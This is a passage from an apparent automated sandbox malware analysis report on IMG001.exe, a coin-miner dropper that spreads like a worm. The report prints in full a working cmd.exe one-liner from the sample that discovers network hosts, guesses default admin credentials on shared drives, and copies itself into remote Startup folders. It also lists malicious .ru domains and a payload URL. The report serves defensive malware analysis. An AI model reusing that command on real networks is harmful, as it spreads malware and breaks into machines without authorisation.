%u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))	Jump to behavior

Source: IMG001.exe, 00000006.00000002.514053900.00000000011A0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: IMG001.exe, 00000006.00000002.514053900.00000000011A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: IMG001.exe, 00000006.00000002.514053900.00000000011A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: IMG001.exe, 00000006.00000002.514053900.00000000011A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\IMG001.exe

Code function: 0_2_00405A12 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405A12

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies power options to not sleep / hibernate

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /CHANGE -hibernate-timeout-ac 0	Jump to behavior

Stealing of Sensitive Information:

Gathers information about network shares

Show sources

Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
Source: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /v:on /c @(for /f 'usebackq tokens=1' %i in (`@net view^\|find /i '\\' ^\|^\| @arp -a^\|find /i ' 1'`) do @set str_!random!=%i)& @for /f 'usebackq tokens=1* delims==' %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:- =!& set f=IMG001.exe& set n=1704& @if not '!s!'=='%COMPUTERNAME%' @echo connect to \\!s! & (for /f 'usebackq tokens=1' %j in (`net view \\!s!^\|find /i ' '`) do @echo f\|xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' '\\!s!\%j\!f!' 1>nul && @echo copy to '\\!s!\%j\!f!') & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin ) do @for %p in (0 1 123 %u !n! '') do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not '%p%u'=='01' net use %c '%p' /user:'%u') && @((echo [Section1] & echo p=%p %u)>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & @(for %d in ('%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!' '%c\Documents and Settings\%u\ \ \ \!f!' '%c\Documents and Settings\All Users\ \ \ \!f!' '%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!' '%c\Windows\All Users\Start menu\Programs\Startup\!f!' '%c\%u\!f!' ) do @echo f\|@xcopy /y /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' %d 1>nul && @echo copy to %d) & @echo nul>'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P' & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Startup Items1	Startup Items1	Disable or Modify Tools1	Input Capture1	File and Directory Discovery2	Taint Shared Content1	Archive Collected Data1	Exfiltration Over Alternative Protocol1	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Scheduled Task/Job11	Process Injection12	Deobfuscate/Decode Files or Information11	LSASS Memory	System Information Discovery14	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter11	Registry Run Keys / Startup Folder21	Scheduled Task/Job11	Obfuscated Files or Information3	Security Account Manager	Network Share Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job11	Logon Script (Mac)	Registry Run Keys / Startup Folder21	Software Packing2	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery211	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading121	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Modify Registry1	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion21	Proc Filesystem	Remote System Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	System Network Configuration Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	NTFS File Attributes1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IMG001.exe	84%	Virustotal		Browse
IMG001.exe	55%	Metadefender		Browse
IMG001.exe	88%	ReversingLabs	Win32.Trojan.Generic
IMG001.exe	100%	Avira	TR/Dropper.Gen
IMG001.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\tftp.exe	100%	Avira	HEUR/AGEN.1126443
C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\tftp.exe	100%	Avira	HEUR/AGEN.1126443
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	100%	Avira	TR/BitCoinMiner.fra
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	100%	Avira	TR/Dropper.Gen
C:\IMG001.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	100%	Avira	TR/CoinMiner.K
C:\Windows\Temp\tftp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tftp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	100%	Joe Sandbox ML
C:\IMG001.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsxD347.tmp\inetc.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsxD347.tmp\inetc.dll	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\tftp.exe	43%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\tftp.exe	79%	ReversingLabs	Win32.Worm.Coinficon
C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	55%	Metadefender		Browse
C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe	88%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	86%	Metadefender		Browse
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe	100%	ReversingLabs	Win32.Trojan.Coinbitminer
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	89%	Metadefender		Browse
C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe	100%	ReversingLabs	Win64.Coinminer.BitCoinMiner
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	55%	Metadefender		Browse
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\NsMiner\IMG001.exe	88%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.1.IMG001.exe.70360000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.32.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.70370000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.23.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.IMG001.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.1.IMG001.exe.73810000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.17.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.16.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.31.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.28.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.26.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
26.2.IMG001.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.1.IMG001.exe.73810000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.15.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.70370000.12.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.70370000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.30.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.35.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.14.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.21.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.18.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.20.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.701c0000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.40.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.34.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.37.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.36.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.33.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.22.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.25.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
26.0.IMG001.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.1.IMG001.exe.73810000.24.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
10.1.tftp.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.1.IMG001.exe.70370000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.29.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.70370000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.0.IMG001.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.1.IMG001.exe.701c0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.701b0000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.27.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.2.IMG001.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.1.IMG001.exe.70370000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.0.IMG001.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.1.IMG001.exe.70950000.38.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.39.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
6.1.IMG001.exe.73810000.19.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
5.1.tftp.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
hrtests.ru	10%	Virustotal	Browse
profetest.ru	9%	Virustotal	Browse
stafftest.ru	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://hrtests.ru/test.html	8%	Virustotal		Browse
http://hrtests.ru/test.html	0%	Avira URL Cloud	safe
http://profetest.ru/test.html	0%	Avira URL Cloud	safe
http://profetest.ru/stat.html	0%	Avira URL Cloud	safe
http://hrtests.ru/stat.html	0%	Avira URL Cloud	safe
http://stafftest.ru/test.htmlo	0%	Avira URL Cloud	safe
http://profetest.ru/test.htmlO	0%	Avira URL Cloud	safe
http://hrtests.ru/stat.htmlc	0%	Avira URL Cloud	safe
http://stafftest.ru/text.html0	0%	Avira URL Cloud	safe
http://stafftest.ru/stat.html	0%	Avira URL Cloud	safe
http://stafftest.ru/text.html	0%	Avira URL Cloud	safe
http://testswork.ru/info.zip	0%	Avira URL Cloud	safe
http://stafftest.ru/test.htmlD	0%	Avira URL Cloud	safe
http://stafftest.ru/test.html	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hrtests.ru	37.1.216.8	true	true	10%, Virustotal, Browse	unknown
profetest.ru	1.2.3.1	true	false	9%, Virustotal, Browse	unknown
stafftest.ru	255.255.0.0	true	false	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://hrtests.ru/test.html	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hrtests.ru/stat.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://profetest.ru/test.html	IMG001.exe, 00000006.00000002.513988664.0000000000B4A000.00000004.00000020.sdmp, IMG001.exe, 00000006.00000003.371689003.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://profetest.ru/stat.html	IMG001.exe, 00000006.00000002.513988664.0000000000B4A000.00000004.00000020.sdmp, IMG001.exe, 00000006.00000003.371689003.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://stafftest.ru/test.htmlo	IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	IMG001.exe	false		high
http://profetest.ru/test.htmlO	IMG001.exe, 00000006.00000003.371689003.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://hrtests.ru/stat.htmlc	IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://stafftest.ru/text.html0	IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://stafftest.ru/stat.html	IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	IMG001.exe	false		high
http://stafftest.ru/text.html	IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://testswork.ru/info.zip	tftp.exe, tftp.exe, 00000005.00000002.219945929.00000000001D5000.00000004.00000040.sdmp, tftp.exe, 0000000A.00000002.253644349.000000000062D000.00000004.00000010.sdmp, IMG001.exe, 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp, tftp.exe.26.dr	false	Avira URL Cloud: safe	unknown
http://stafftest.ru/test.htmlD	IMG001.exe, 00000006.00000003.248700310.0000000000BAB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://stafftest.ru/test.html	IMG001.exe, 00000006.00000003.271300390.0000000000BA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
208.96.174.244	unknown	United States	22418	COLOGUS	false
19.241.222.80	unknown	United States	3	MIT-GATEWAYSUS	false
55.142.1.120	unknown	United States	1541	DNIC-ASBLK-01534-01546US	false
104.73.134.124	unknown	United States	16625	AKAMAI-ASUS	false
67.58.234.31	unknown	United States	14051	SUREWESTUS	false
82.231.211.245	unknown	France	12322	PROXADFR	false
220.84.242.201	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
105.179.204.191	unknown	unknown	37228	Olleh-Rwanda-NetworksRW	false
41.35.35.143	unknown	Egypt	8452	TE-ASTE-ASEG	false
103.247.141.163	unknown	Hong Kong	9381	HKBNES-AS-APHKBNEnterpriseSolutionsHKLimitedHK	false
149.207.134.197	unknown	Germany	15854	HP_WEBSERVICESDE	false
41.203.78.215	unknown	Nigeria	37148	globacom-asNG	false
33.192.134.169	unknown	United States	2686	ATGS-MMD-ASUS	false
40.52.92.245	unknown	United States	4249	LILLY-ASUS	false
212.70.158.89	unknown	Bulgaria	12615	GCN-ASGCNAD-SofiaBulgariaBG	false
89.239.143.118	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
1.2.3.1	profetest.ru	Australia	13335	CLOUDFLARENETUS	false
44.72.12.182	unknown	United States	7377	UCSDUS	false
147.14.213.133	unknown	Sweden	41076	POSTDK-ASDK	false
41.23.111.248	unknown	South Africa	29975	VODACOM-ZA	false
171.230.248.102	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	false
122.26.216.107	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
96.72.172.148	unknown	United States	7922	COMCAST-7922US	false
171.117.176.171	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
131.75.79.149	unknown	United States	27046	DNIC-ASBLK-27032-27159US	false
185.29.165.99	unknown	Netherlands	22363	PHMGMT-AS1US	false
99.236.23.224	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
171.49.33.151	unknown	India	45609	BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSService	false
73.1.14.7	unknown	United States	7922	COMCAST-7922US	false
129.116.232.201	unknown	United States	18	UTEXASUS	false
179.128.98.73	unknown	Brazil	26599	TELEFONICABRASILSABR	false
78.3.123.203	unknown	Croatia (LOCAL Name: Hrvatska)	5391	T-HTCroatianTelecomIncHR	false
128.166.71.75	unknown	United States	11039	GWUUS	false
207.130.230.190	unknown	United States	6289	AHM-CORPUS	false
86.62.15.78	unknown	Russian Federation	60764	TK-TELECOMRU	false
219.170.142.236	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
91.55.235.46	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	true
90.125.237.45	unknown	France	3215	FranceTelecom-OrangeFR	false
171.166.62.66	unknown	United States	9874	STARHUB-MOBILEStarHubLtdSG	false
104.104.124.171	unknown	United States	16625	AKAMAI-ASUS	false
41.159.74.41	unknown	Gabon	16058	Gabon-TelecomGA	false
65.254.158.12	unknown	United States	13638	METALINKUS	false
121.60.39.136	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
116.43.105.72	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
198.61.197.74	unknown	United States	33070	RMH-14US	false
144.46.165.116	unknown	United States	21286	KPN-CORPORATE-MARKETNL	false
24.49.188.7	unknown	United States	40285	NORTHLAND-CABLEUS	false
85.160.162.223	unknown	Czech Republic	5610	O2-CZECH-REPUBLICCZ	false
169.106.68.226	unknown	United States	37611	AfrihostZA	false
130.142.102.100	unknown	Netherlands	137	ASGARRConsortiumGARREU	false
153.176.174.168	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
45.5.247.37	unknown	Brazil	266110	AECIOMACARIODOSSANTOSMEBR	false
90.242.155.36	unknown	United Kingdom	5378	VodafoneGB	false
144.116.50.234	unknown	United States	3634	SFASU-ASUS	false
46.76.75.38	unknown	Poland	8374	PLUSNETPlusnetworkoperatorinPolandPL	false
12.106.190.66	unknown	United States	2386	INS-ASUS	false
104.123.51.43	unknown	United States	20940	AKAMAI-ASN1EU	false
104.86.148.28	unknown	United States	16625	AKAMAI-ASUS	false
216.28.55.232	unknown	United States	174	COGENT-174US	false
150.218.53.109	unknown	United States	10952	ECU-ASUS	false
109.254.18.193	unknown	Ukraine	20590	DEC-ASUA	false
103.246.251.106	unknown	New Zealand	54046	QUICKWEB-USA-NETNZ	false
112.134.97.100	unknown	Sri Lanka	9329	SLTINT-AS-APSriLankaTelecomInternetLK	false
76.237.177.216	unknown	United States	7018	ATT-INTERNET4US	false
125.233.60.227	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
218.96.42.181	unknown	China	10212	CHINAENTERCOMChinaEnterpriseCommunicationsLtdCN	false
219.184.234.178	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
37.1.216.8	hrtests.ru	Ukraine	58061	SCALAXY-ASNL	true
210.220.207.9	unknown	Korea Republic of	4663	ELIMNET-AS-KRELIMNETINCKR	false
117.44.26.168	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
25.183.69.138	unknown	United Kingdom	7922	COMCAST-7922US	false
157.228.18.187	unknown	United Kingdom	786	JANETJiscServicesLimitedGB	false
17.22.172.54	unknown	United States	714	APPLE-ENGINEERINGUS	false
166.238.30.180	unknown	United States	26611	COMCELSACO	false
121.206.203.45	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
64.116.62.52	unknown	United States	14551	UUNET-SAUS	false
171.177.72.44	unknown	United States	9874	STARHUB-MOBILEStarHubLtdSG	false
130.225.23.51	unknown	Denmark	1835	FSKNET-DKForskningsnettet-DanishnetworkforResearchand	false
3.108.243.58	unknown	United States	16509	AMAZON-02US	false
89.144.231.130	unknown	Austria	8447	TELEKOM-ATA1TelekomAustriaAGAT	false
155.130.203.173	unknown	United States	22911	SINAP-TIXUS	false
34.242.168.15	unknown	United States	16509	AMAZON-02US	false
80.72.208.69	unknown	Russian Federation	34490	TSC-ASTomskRussiaRU	false
159.250.55.26	unknown	United States	11776	ATLANTICBB-JOHNSTOWNUS	false
153.14.101.251	unknown	United States	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
194.72.18.27	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	386387
Start date:	14.04.2021
Start time:	04:48:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IMG001.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.spyw.evad.mine.winEXE@122/22@31/87
EGA Information:	Successful, ratio: 100%
